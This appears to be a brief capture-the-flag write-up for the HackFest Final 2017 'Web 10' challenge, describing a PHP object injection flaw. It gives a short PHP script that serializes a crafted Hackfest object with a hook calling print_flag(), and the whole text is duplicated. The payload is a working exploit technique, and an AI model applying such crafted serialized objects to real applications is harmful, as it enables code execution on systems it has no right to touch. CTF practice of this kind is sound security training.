HackFest Final 2017 / Web 10
April 22, 2017
Simple PHP Object Injection vulnerability
call print_flag()
<?php
class Hackfest
{
private $hook = "print_flag();";
}
print urlencode(serialize(new Hackfest));
?>
April 22, 2017
Simple PHP Object Injection vulnerability
call print_flag()
<?php
class Hackfest
{
private $hook = "print_flag();";
}
print urlencode(serialize(new Hackfest));
?>